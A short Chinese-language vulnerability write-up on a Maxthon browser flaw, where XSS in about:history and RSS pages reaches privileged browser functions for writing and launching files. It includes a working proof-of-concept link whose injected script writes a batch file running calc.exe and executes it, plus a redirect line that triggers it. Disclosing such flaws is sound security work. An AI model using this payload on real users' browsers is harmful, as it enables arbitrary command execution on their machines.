傲游浏览器命令执行漏洞介绍以及修复方案
<img alt="" src="https://img.jbzj.com/file_images/article/201207/20120712170754169.jpg" /><br /><img alt="" src="https://img.jbzj.com/file_images/article/201207/20120712170754170.jpg" /><br /><img alt="" src="https://img.jbzj.com/file_images/article/201207/20120712170754171.jpg" /><br /><img alt="" src="https://img.jbzj.com/file_images/article/201207/20120712170754172.jpg" /><br />这个漏洞首先是国外某个团队发现的,他研究了多个浏览器的漏洞。其中遨游的漏洞比较独特,大致存在几个方面的,<br />1.about:history中存在xss漏洞,即浏览历史中url链接中存在明显的xss漏洞。<br />2.遨游的拓展中存在大量敏感函数,其中包括了写文件(目前看只能写在C:\Documents and Settings\Administrator\Local Settings\Temp目录下),命令执行(执行你写入的文件),此外目测还有大量系统内部数据可以操作,比如下载,配置等等。<br />3.除了1所说的地方外,Rss订阅那里也有xss漏洞,我个人估计遨游自己的插件大部分地方可能都会存在xss漏洞<br />4.2中所提到的大量敏感函数都是在dom中,只能在域i.maxthon.com以及本地类似浏览历史,收藏夹这种地方被调用。<br /> <br />构造类似链接<br />http://www.jb51.net /1.html#\"><img src=a onerror='var b=maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k calc.exe");alert(b.name_);maxthon.program.Program.launch(b.name_,"C:\\WINDOWS\\system32")'/><br /> <br />在遨游中访问,<br />然后打开about:history,就可以看到效果了<br />那个pdf给的例子是构造了1.html的内容为<br />a=window.location.href='about:history';<br /> <br />修复方案:<br /><br />ms遨游已经修复了直接打开about:history这个洞
頁:
[1]